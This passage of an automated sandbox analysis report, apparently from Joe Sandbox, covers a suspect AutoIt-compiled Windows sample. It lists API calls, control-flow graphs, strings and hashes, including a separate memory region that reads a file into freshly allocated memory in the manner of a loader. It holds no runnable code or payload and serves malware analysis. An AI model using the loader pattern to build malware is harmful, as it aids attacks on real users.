                                                                                • Opcode Fuzzy Hash: 8a14c52ba328cd37fa8c864a6455e94f1c3b071528609dd012c05e58450f9e4c
                                                                                • Instruction Fuzzy Hash: C4222771A006099BEF299F68CC95BFD7B71EB04326F644228ED119B2E1C7BD8D48C791

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • _wcscpy.LIBCMT ref: 0076FA96
                                                                                • _wcschr.LIBCMT ref: 0076FAA4
                                                                                • _wcscpy.LIBCMT ref: 0076FABB
                                                                                • _wcscat.LIBCMT ref: 0076FACA
                                                                                • _wcscat.LIBCMT ref: 0076FAE8
                                                                                • _wcscpy.LIBCMT ref: 0076FB09
                                                                                • __wsplitpath.LIBCMT ref: 0076FBE6
                                                                                • _wcscpy.LIBCMT ref: 0076FC0B
                                                                                • _wcscpy.LIBCMT ref: 0076FC1D
                                                                                • _wcscpy.LIBCMT ref: 0076FC32
                                                                                • _wcscat.LIBCMT ref: 0076FC47
                                                                                • _wcscat.LIBCMT ref: 0076FC59
                                                                                • _wcscat.LIBCMT ref: 0076FC6E
                                                                                  • Part of subcall function 0076BFA4: _wcscmp.LIBCMT ref: 0076C03E
                                                                                  • Part of subcall function 0076BFA4: __wsplitpath.LIBCMT ref: 0076C083
                                                                                  • Part of subcall function 0076BFA4: _wcscpy.LIBCMT ref: 0076C096
                                                                                  • Part of subcall function 0076BFA4: _wcscat.LIBCMT ref: 0076C0A9
                                                                                  • Part of subcall function 0076BFA4: __wsplitpath.LIBCMT ref: 0076C0CE
                                                                                  • Part of subcall function 0076BFA4: _wcscat.LIBCMT ref: 0076C0E4
                                                                                  • Part of subcall function 0076BFA4: _wcscat.LIBCMT ref: 0076C0F7
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
                                                                                • String ID: >>>AUTOIT SCRIPT<<<$t2}
                                                                                • API String ID: 2955681530-2732350312
                                                                                • Opcode ID: 60c2a9acd4f1f233f977701071d7a833286fb420618f3ca8668e3b3933b481cc
                                                                                • Instruction ID: b6dd228215f331c7cad51d52939333c8a5564dd9b679c3d0bd625a6658eb456a
                                                                                • Opcode Fuzzy Hash: 60c2a9acd4f1f233f977701071d7a833286fb420618f3ca8668e3b3933b481cc
                                                                                • Instruction Fuzzy Hash: FD91A372504705DFDB20EB64D895F9AB3E8BF44310F04486DF94A97292DB38FA48CB92
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: __getptd_noexit
                                                                                • String ID:
                                                                                • API String ID: 3074181302-0
                                                                                • Opcode ID: 64d254b1fb6369c9ae1d2fc8b5a0b8e49b0889f01486e1b33216d64540e48c0d
                                                                                • Instruction ID: 331aa4a6fbd82553f10c82af3123648090fcddb24ec9d872a11a495386cc6b07
                                                                                • Opcode Fuzzy Hash: 64d254b1fb6369c9ae1d2fc8b5a0b8e49b0889f01486e1b33216d64540e48c0d
                                                                                • Instruction Fuzzy Hash: 6D322970E04295DFDB218F68D880BADBBB1BF46310F25816AE8559F293D77C9C41CBA1

                                                                                Control-flow Graph

                                                                                APIs
                                                                                  • Part of subcall function 0076BDB4: __time64.LIBCMT ref: 0076BDBE
                                                                                  • Part of subcall function 00724517: _fseek.LIBCMT ref: 0072452F
                                                                                • __wsplitpath.LIBCMT ref: 0076C083
                                                                                  • Part of subcall function 00741DFC: __wsplitpath_helper.LIBCMT ref: 00741E3C
                                                                                • _wcscpy.LIBCMT ref: 0076C096
                                                                                • _wcscat.LIBCMT ref: 0076C0A9
                                                                                • __wsplitpath.LIBCMT ref: 0076C0CE
                                                                                • _wcscat.LIBCMT ref: 0076C0E4
                                                                                • _wcscat.LIBCMT ref: 0076C0F7
                                                                                • _wcscmp.LIBCMT ref: 0076C03E
                                                                                  • Part of subcall function 0076C56D: _wcscmp.LIBCMT ref: 0076C65D
                                                                                  • Part of subcall function 0076C56D: _wcscmp.LIBCMT ref: 0076C670
                                                                                • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 0076C2A1
                                                                                • DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0076C338
                                                                                • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0076C34E
                                                                                • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0076C35F
                                                                                • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0076C371
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath$Copy__time64__wsplitpath_helper_fseek_wcscpy
                                                                                • String ID: p1Mw`KNw
                                                                                • API String ID: 2378138488-3626030660
                                                                                • Opcode ID: 6ce7a8ec42a20e9634df3a052462b9381f2c7355074e51abd941611c74461c3a
                                                                                • Instruction ID: 03ac73a64f2b909976b72cd36782f87b46c47dfb0e18586b07ddfb4b2dfa1923
                                                                                • Opcode Fuzzy Hash: 6ce7a8ec42a20e9634df3a052462b9381f2c7355074e51abd941611c74461c3a
                                                                                • Instruction Fuzzy Hash: 75C11CB1A00229EEDF11DF95CC85EEEB7BCAF45310F1040A6EA4AE6151DB349A448F65

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • GetSysColorBrush.USER32(0000000F), ref: 00723F86
                                                                                • RegisterClassExW.USER32(00000030), ref: 00723FB0
                                                                                • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00723FC1
                                                                                • InitCommonControlsEx.COMCTL32(?), ref: 00723FDE
                                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00723FEE
                                                                                • LoadIconW.USER32(000000A9), ref: 00724004
                                                                                • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00724013
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                • API String ID: 2914291525-1005189915
                                                                                • Opcode ID: a37efe28678ca3d169d54befa58ec1010b84c7263087aadb34d7d8281458f239
                                                                                • Instruction ID: 7e4cacacaf436f447e357cce4c8ec00a9a01c453879c82b5d73045383d6140fe
                                                                                • Opcode Fuzzy Hash: a37efe28678ca3d169d54befa58ec1010b84c7263087aadb34d7d8281458f239
                                                                                • Instruction Fuzzy Hash: 3A21C9B5901358AFDB10DFA4EC8ABCEBBB4FB4D700F40811AF511AA6A0D7B845448F99

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1174 723742-723762 1176 7237c2-7237c4 1174->1176 1177 723764-723767 1174->1177 1176->1177 1180 7237c6 1176->1180 1178 7237c8 1177->1178 1179 723769-723770 1177->1179 1184 791e00-791e2e call 722ff6 call 73e312 1178->1184 1185 7237ce-7237d1 1178->1185 1181 723776-72377b 1179->1181 1182 72382c-723834 PostQuitMessage 1179->1182 1183 7237ab-7237b3 DefWindowProcW 1180->1183 1187 791e88-791e9c call 764ddd 1181->1187 1188 723781-723783 1181->1188 1189 7237f2-7237f4 1182->1189 1190 7237b9-7237bf 1183->1190 1219 791e33-791e3a 1184->1219 1191 7237d3-7237d4 1185->1191 1192 7237f6-72381d SetTimer RegisterWindowMessageW 1185->1192 1187->1189 1213 791ea2 1187->1213 1194 723836-723840 call 73eb83 1188->1194 1195 723789-72378e 1188->1195 1189->1190 1198 7237da-7237ed KillTimer call 723847 call 72390f 1191->1198 1199 791da3-791da6 1191->1199 1192->1189 1196 72381f-72382a CreatePopupMenu 1192->1196 1214 723845 1194->1214 1202 791e6d-791e74 1195->1202 1203 723794-723799 1195->1203 1196->1189 1198->1189 1206 791da8-791daa 1199->1206 1207 791ddc-791dfb MoveWindow 1199->1207 1202->1183 1209 791e7a-791e83 call 75a5f3 1202->1209 1211 791e58-791e68 call 7655bd 1203->1211 1212 72379f-7237a5 1203->1212 1215 791dcb-791dd7 SetFocus 1206->1215 1216 791dac-791daf 1206->1216 1207->1189 1209->1183 1211->1189 1212->1183 1212->1219 1213->1183 1214->1189 1215->1189 1216->1212 1220 791db5-791dc6 call 722ff6 1216->1220 1219->1183 1224 791e40-791e53 call 723847 call 724ffc 1219->1224 1220->1189 1224->1183
                                                                                APIs
                                                                                • DefWindowProcW.USER32(?,?,?,?), ref: 007237B3
                                                                                • KillTimer.USER32(?,00000001), ref: 007237DD
                                                                                • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00723800
                                                                                • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0072380B
                                                                                • CreatePopupMenu.USER32 ref: 0072381F
                                                                                • PostQuitMessage.USER32(00000000), ref: 0072382E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                • String ID: TaskbarCreated
                                                                                • API String ID: 129472671-2362178303
                                                                                • Opcode ID: 0e1d98a04f90a4715ef71a5160fa41e1e39db08150a26b8c4e5a252c4d2d7931
                                                                                • Instruction ID: 9496afedacb339c5ba17a9b3784286805bc1eb4380bb1177231d2dabf55e6a50
                                                                                • Opcode Fuzzy Hash: 0e1d98a04f90a4715ef71a5160fa41e1e39db08150a26b8c4e5a252c4d2d7931
                                                                                • Instruction Fuzzy Hash: E44148F12002AAABDF245B28BCCEBBA3655F748301F808125F902D6291CB7C9E508765

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • GetSysColorBrush.USER32(0000000F), ref: 00723E79
                                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 00723E88
                                                                                • LoadIconW.USER32(00000063), ref: 00723E9E
                                                                                • LoadIconW.USER32(000000A4), ref: 00723EB0
                                                                                • LoadIconW.USER32(000000A2), ref: 00723EC2
                                                                                  • Part of subcall function 00724024: LoadImageW.USER32(00720000,00000063,00000001,00000010,00000010,00000000), ref: 00724048
                                                                                • RegisterClassExW.USER32(?), ref: 00723F30
                                                                                  • Part of subcall function 00723F53: GetSysColorBrush.USER32(0000000F), ref: 00723F86
                                                                                  • Part of subcall function 00723F53: RegisterClassExW.USER32(00000030), ref: 00723FB0
                                                                                  • Part of subcall function 00723F53: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00723FC1
                                                                                  • Part of subcall function 00723F53: InitCommonControlsEx.COMCTL32(?), ref: 00723FDE
                                                                                  • Part of subcall function 00723F53: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00723FEE
                                                                                  • Part of subcall function 00723F53: LoadIconW.USER32(000000A9), ref: 00724004
                                                                                  • Part of subcall function 00723F53: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00724013
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                • String ID: #$0$AutoIt v3
                                                                                • API String ID: 423443420-4155596026
                                                                                • Opcode ID: 6f5e90f84c571fa144556ad5a4f28e2fd9bfbe244228cdd1c313b9c53bd02c6c
                                                                                • Instruction ID: bdf0c4e4387df6908409b1a44c078adddb7d6a15c24bd96d89e870eabaca9909
                                                                                • Opcode Fuzzy Hash: 6f5e90f84c571fa144556ad5a4f28e2fd9bfbe244228cdd1c313b9c53bd02c6c
                                                                                • Instruction Fuzzy Hash: AB2136B0E01358ABDB14DFA9EC86B99BBF5EB4C310F40811AE215A62A0D77D46448F99

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1238 74acb3-74ace0 call 746ac0 call 747cf4 call 746986 1245 74ace2-74acf8 call 74e880 1238->1245 1246 74acfd-74ad02 1238->1246 1254 74af52-74af57 call 746b05 1245->1254 1248 74ad08-74ad0f 1246->1248 1249 74ad11-74ad40 1248->1249 1250 74ad42-74ad51 GetStartupInfoW 1248->1250 1249->1248 1252 74ad57-74ad5c 1250->1252 1253 74ae80-74ae86 1250->1253 1252->1253 1256 74ad62-74ad79 1252->1256 1257 74af44-74af50 call 74af58 1253->1257 1258 74ae8c-74ae9d 1253->1258 1260 74ad80-74ad83 1256->1260 1261 74ad7b-74ad7d 1256->1261 1257->1254 1262 74aeb2-74aeb8 1258->1262 1263 74ae9f-74aea2 1258->1263 1265 74ad86-74ad8c 1260->1265 1261->1260 1267 74aebf-74aec6 1262->1267 1268 74aeba-74aebd 1262->1268 1263->1262 1266 74aea4-74aead 1263->1266 1271 74adae-74adb6 1265->1271 1272 74ad8e-74ad9f call 746986 1265->1272 1273 74af3e-74af3f 1266->1273 1270 74aec9-74aed5 GetStdHandle 1267->1270 1268->1270 1274 74aed7-74aed9 1270->1274 1275 74af1c-74af32 1270->1275 1277 74adb9-74adbb 1271->1277 1283 74ada5-74adab 1272->1283 1284 74ae33-74ae3a 1272->1284 1273->1253 1274->1275 1278 74aedb-74aee4 GetFileType 1274->1278 1275->1273 1280 74af34-74af37 1275->1280 1277->1253 1281 74adc1-74adc6 1277->1281 1278->1275 1282 74aee6-74aef0 1278->1282 1280->1273 1285 74ae20-74ae31 1281->1285 1286 74adc8-74adcb 1281->1286 1287 74aef2-74aef8 1282->1287 1288 74aefa-74aefd 1282->1288 1283->1271 1289 74ae40-74ae4e 1284->1289 1285->1277 1286->1285 1290 74adcd-74add1 1286->1290 1292 74af05 1287->1292 1293 74aeff-74af03 1288->1293 1294 74af08-74af1a InitializeCriticalSectionAndSpinCount 1288->1294 1295 74ae74-74ae7b 1289->1295 1296 74ae50-74ae72 1289->1296 1290->1285 1291 74add3-74add5 1290->1291 1297 74ade5-74ae1a InitializeCriticalSectionAndSpinCount 1291->1297 1298 74add7-74ade3 GetFileType 1291->1298 1292->1294 1293->1292 1294->1273 1295->1265 1296->1289 1299 74ae1d 1297->1299 1298->1297 1298->1299 1299->1285
                                                                                APIs
                                                                                • __lock.LIBCMT ref: 0074ACC1
                                                                                  • Part of subcall function 00747CF4: __mtinitlocknum.LIBCMT ref: 00747D06
                                                                                  • Part of subcall function 00747CF4: EnterCriticalSection.KERNEL32(00000000,?,00747ADD,0000000D), ref: 00747D1F
                                                                                • __calloc_crt.LIBCMT ref: 0074ACD2
                                                                                  • Part of subcall function 00746986: __calloc_impl.LIBCMT ref: 00746995
                                                                                  • Part of subcall function 00746986: Sleep.KERNEL32(00000000,000003BC,0073F507,?,0000000E), ref: 007469AC
                                                                                • @_EH4_CallFilterFunc@8.LIBCMT ref: 0074ACED
                                                                                • GetStartupInfoW.KERNEL32(?,007D6E28,00000064,00745E91,007D6C70,00000014), ref: 0074AD46
                                                                                • __calloc_crt.LIBCMT ref: 0074AD91
                                                                                • GetFileType.KERNEL32(00000001), ref: 0074ADD8
                                                                                • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 0074AE11
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
                                                                                • String ID:
                                                                                • API String ID: 1426640281-0
                                                                                • Opcode ID: 50b3fd6071b158e0ea34d658e54d083410703b77f5e2f1cac8111f58058820f8
                                                                                • Instruction ID: 278c72b3cdedf24d004602ecad559ff18d67614423085abd9bd889b0a2c81e6c
                                                                                • Opcode Fuzzy Hash: 50b3fd6071b158e0ea34d658e54d083410703b77f5e2f1cac8111f58058820f8
                                                                                • Instruction Fuzzy Hash: 5B81F371945351DFDB24CF68C8855A9BBF0AF0A320B24826DD4A6AB3D2D73CD803CB56

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1300 f06358-f06406 call f03d48 1303 f0640d-f06433 call f07268 CreateFileW 1300->1303 1306 f06435 1303->1306 1307 f0643a-f0644a 1303->1307 1308 f06585-f06589 1306->1308 1315 f06451-f0646b VirtualAlloc 1307->1315 1316 f0644c 1307->1316 1309 f065cb-f065ce 1308->1309 1310 f0658b-f0658f 1308->1310 1312 f065d1-f065d8 1309->1312 1313 f06591-f06594 1310->1313 1314 f0659b-f0659f 1310->1314 1319 f065da-f065e5 1312->1319 1320 f0662d-f06642 1312->1320 1313->1314 1321 f065a1-f065ab 1314->1321 1322 f065af-f065b3 1314->1322 1317 f06472-f06489 ReadFile 1315->1317 1318 f0646d 1315->1318 1316->1308 1323 f06490-f064d0 VirtualAlloc 1317->1323 1324 f0648b 1317->1324 1318->1308 1325 f065e7 1319->1325 1326 f065e9-f065f5 1319->1326 1327 f06652-f0665a 1320->1327 1328 f06644-f0664f VirtualFree 1320->1328 1321->1322 1329 f065c3 1322->1329 1330 f065b5-f065bf 1322->1330 1331 f064d2 1323->1331 1332 f064d7-f064f2 call f074b8 1323->1332 1324->1308 1325->1320 1333 f065f7-f06607 1326->1333 1334 f06609-f06615 1326->1334 1328->1327 1329->1309 1330->1329 1331->1308 1340 f064fd-f06507 1332->1340 1336 f0662b 1333->1336 1337 f06622-f06628 1334->1337 1338 f06617-f06620 1334->1338 1336->1312 1337->1336 1338->1336 1341 f06509-f06538 call f074b8 1340->1341 1342 f0653a-f0654e call f072c8 1340->1342 1341->1340 1347 f06550 1342->1347 1348 f06552-f06556 1342->1348 1347->1308 1350 f06562-f06566 1348->1350 1351 f06558-f0655c CloseHandle 1348->1351 1352 f06576-f0657f 1350->1352 1353 f06568-f06573 VirtualFree 1350->1353 1351->1350 1352->1303 1352->1308 1353->1352
                                                                                APIs
                                                                                • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 00F06429
                                                                                • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00F0664F
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1289125454.0000000000F03000.00000040.00000020.00020000.00000000.sdmp, Offset: 00F03000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_f03000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: CreateFileFreeVirtual
                                                                                • String ID:
                                                                                • API String ID: 204039940-0
                                                                                • Opcode ID: e3e00bf9dbafeb2e33b0b1731302cb2fbf5584eb46f22b1b855d3d8c7a9348fe
                                                                                • Instruction ID: 936ca2029c4e18ed13c7aa931822335cca9c1e59e9997a1b6133d17e09a34822
                                                                                • Opcode Fuzzy Hash: e3e00bf9dbafeb2e33b0b1731302cb2fbf5584eb46f22b1b855d3d8c7a9348fe
                                                                                • Instruction Fuzzy Hash: 92A11775E00209EBDB14CFA4C998BEEBBB5BF48314F208159E501BB2C0D775AA51EF64

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1409 7249fb-724a25 call 72bcce RegOpenKeyExW 1412 7941cc-7941e3 RegQueryValueExW 1409->1412 1413 724a2b-724a2f 1409->1413 1414 7941e5-794222 call 73f4ea call 7247b7 RegQueryValueExW 1412->1414 1415 794246-79424f RegCloseKey 1412->1415 1420 79423d-794245 call 7247e2 1414->1420 1421 794224-79423b call 726a63 1414->1421 1420->1415 1421->1420
                                                                                APIs
                                                                                • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00724A1D
                                                                                • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 007941DB
                                                                                • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0079421A
                                                                                • RegCloseKey.ADVAPI32(?), ref: 00794249
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: QueryValue$CloseOpen
                                                                                • String ID: Include$Software\AutoIt v3\AutoIt
                                                                                • API String ID: 1586453840-614718249
                                                                                • Opcode ID: bb386d741658bf5599398351a84e70e94a7f4fb1ab2c1e54329cdd6ad1bcc4d7
                                                                                • Instruction ID: fdc136398eb214848aad866e80334d09fa697ab537054db4cebe6e19f5a6858b
                                                                                • Opcode Fuzzy Hash: bb386d741658bf5599398351a84e70e94a7f4fb1ab2c1e54329cdd6ad1bcc4d7
                                                                                • Instruction Fuzzy Hash: D2116075600118BFEB10ABA4DD86EEF7BBCEF15344F004055B502D6191EA785E029760

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1436 7236b8-723728 CreateWindowExW * 2 ShowWindow * 2
                                                                                APIs
                                                                                • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 007236E6
                                                                                • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00723707
                                                                                • ShowWindow.USER32(00000000,?,?,?,?,00723AA3,?), ref: 0072371B
                                                                                • ShowWindow.USER32(00000000,?,?,?,?,00723AA3,?), ref: 00723724
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: Window$CreateShow
                                                                                • String ID: AutoIt v3$edit
                                                                                • API String ID: 1584632944-3779509399
                                                                                • Opcode ID: 6648f6238fdc8c0bf435a90e4f0d55e88ed8b1f74334c9a803553c35125700e7
                                                                                • Instruction ID: 8d7d4f9c8e2ae8e6453371f5d78ad2fcd22396be58418ae7b830a8f525d01c49
                                                                                • Opcode Fuzzy Hash: 6648f6238fdc8c0bf435a90e4f0d55e88ed8b1f74334c9a803553c35125700e7
                                                                                • Instruction Fuzzy Hash: 78F03A705412D47AEB309757AC8AF672E7DD7CBF20F40C01ABA04EA1A0C1790CC1CAB4

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
